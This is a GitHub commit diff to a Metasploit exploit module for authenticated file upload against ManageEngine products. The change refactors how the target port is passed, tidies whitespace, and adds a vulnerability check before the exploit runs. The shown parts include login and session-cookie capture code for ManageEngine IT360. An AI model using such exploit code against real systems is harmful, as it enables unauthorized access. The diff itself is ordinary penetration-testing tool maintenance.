Skip to content

Commit ed26a2f

Browse files
jvazquez-r7jvazquez-r7
committed
Avoid modify datastore options
1 parent 3c0efe4 commit ed26a2f

File tree

1 file changed

+16
-13
lines changed

1 file changed

+16
-13
lines changed

modules/exploits/multi/http/manageengine_auth_upload.rb

Lines changed: 16 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -163,29 +163,25 @@ def authenticate_it360(port, path, username, password)
163163
}
164164
else
165165
vars_post = {
166-
'LOGIN_ID' => username,
167-
'PASSWORD' => password,
168-
'isADEnabled' => 'true',
169-
'domainName' => datastore['DOMAIN_NAME']
166+
'LOGIN_ID' => username,
167+
'PASSWORD' => password,
168+
'isADEnabled' => 'true',
169+
'domainName' => datastore['DOMAIN_NAME']
170170
}
171171
end
172172

173-
sd_port = datastore['RPORT']
174-
datastore['RPORT'] = port
175-
176173
res = send_request_cgi({
174+
'rport' => port,
177175
'method' => 'POST',
178-
'uri' => normalize_uri(path),
176+
'uri' => normalize_uri(path),
179177
'vars_get' => {
180-
'service' => 'ServiceDesk',
181-
'furl' => '/',
178+
'service' => 'ServiceDesk',
179+
'furl' => '/',
182180
'timestamp' => Time.now.to_i
183181
},
184182
'vars_post' => vars_post
185183
})
186184

187-
datastore['RPORT'] = sd_port
188-
189185
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
190186
# /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
191187
return res.get_cookies
@@ -211,7 +207,7 @@ def get_it360_cookie_name
211207

212208
def login_it360
213209
# Do we already have a valid cookie? If yes, just return that.
214-
if datastore['IAMAGENTTICKET'] != nil
210+
if datastore['IAMAGENTTICKET']
215211
cookie_name = get_it360_cookie_name
216212
cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
217213
return cookie
@@ -230,6 +226,7 @@ def login_it360
230226
end
231227

232228
cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
229+
233230
if cookie != nil
234231
return cookie
235232
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
@@ -371,6 +368,11 @@ def pick_target
371368

372369

373370
def exploit
371+
if check == Exploit::CheckCode::Safe
372+
fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
373+
end
374+
375+
print_status("#{peer} - Selecting target...")
374376
@my_target = pick_target
375377
print_status("#{peer} - Selected target #{@my_target.name}")
376378

@@ -379,6 +381,7 @@ def exploit
379381
else
380382
cookie = login
381383
end
384+
382385
if cookie == nil
383386
fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
384387
end

0 commit comments

Comments
 (0)